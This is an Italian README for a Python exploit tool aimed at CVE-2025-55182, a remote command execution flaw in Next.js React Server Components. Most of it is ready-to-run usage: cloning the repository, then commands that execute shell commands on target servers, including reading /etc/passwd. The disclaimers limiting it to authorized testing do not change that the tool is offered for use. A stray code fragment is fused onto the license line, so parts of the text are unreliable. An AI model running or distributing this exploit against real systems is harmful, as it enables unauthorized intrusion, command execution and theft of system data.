
Uno strumento di sfruttamento per la vulnerabilità Next.js CVE-2025-55182 che consente l'esecuzione di comandi a distanza tramite un avvelenamento del prototipo nei React Server Components.
Exploit Python per la vulnerabilità RCE di Next.js React Server Components con supporto HTTP/HTTPS.
# Clona ed esegui
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<comando>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
Solo per test di sicurezza autorizzati.
Utilizzare solo su sistemi di proprietà o per i quali si dispone di esplicita autorizzazione. Non utilizzare mai per attività illegali.
child_process.execSync()Licenza MIT - vedi file LICENSE
Disclaimer: Solo a scopo educativo. Ottieni sempre la corretta autorizzazione.
Ultimo aggiornamento: 8 febbraio 2025
Versione: 2.0.0
Manutentore: BrianLopezM99